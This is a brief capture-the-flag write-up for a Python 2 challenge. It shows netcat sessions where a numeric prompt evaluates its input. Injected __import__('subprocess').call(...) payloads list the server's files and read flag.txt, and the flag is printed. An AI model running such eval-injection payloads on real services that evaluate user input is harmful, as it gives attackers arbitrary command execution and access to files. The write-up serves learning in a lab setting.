Printwriter -1

solved by tomato

I’m not very good at C, so I coded this challenge in Python. Don’t have Python 3 yet though, so I used Python 2… At least it can’t be pwned!

I first noticed that there is some template injection (? because like we aren’t using any templates here, idk what to call it):

┌──(rwandi㉿ryan)-[~/ctf/blahaj] └─$ nc 30007 Print what? rwandi How many times? 2*2 rwandi rwandi rwandi rwandi

So we can get shell simply with:

┌──(rwandi㉿ryan)-[~/ctf/nightmare/Stack_Buffer_Overflow] └─$ nc 30007 Print what? rwandi How many times? __import__("subprocess").call(["ls","-l"]) total 8 -rw-r--r-- 1 root root 45 Dec 2 06:54 flag.txt -rwxr-xr-x 1 root root 267 Dec 2 06:54 run Print what? rwandi How many times? __import__("subprocess").call(["cat","flag.txt"]) blahaj{0uT_w17h_th3_N3W_4Nd_1N_w1tH_the_Old}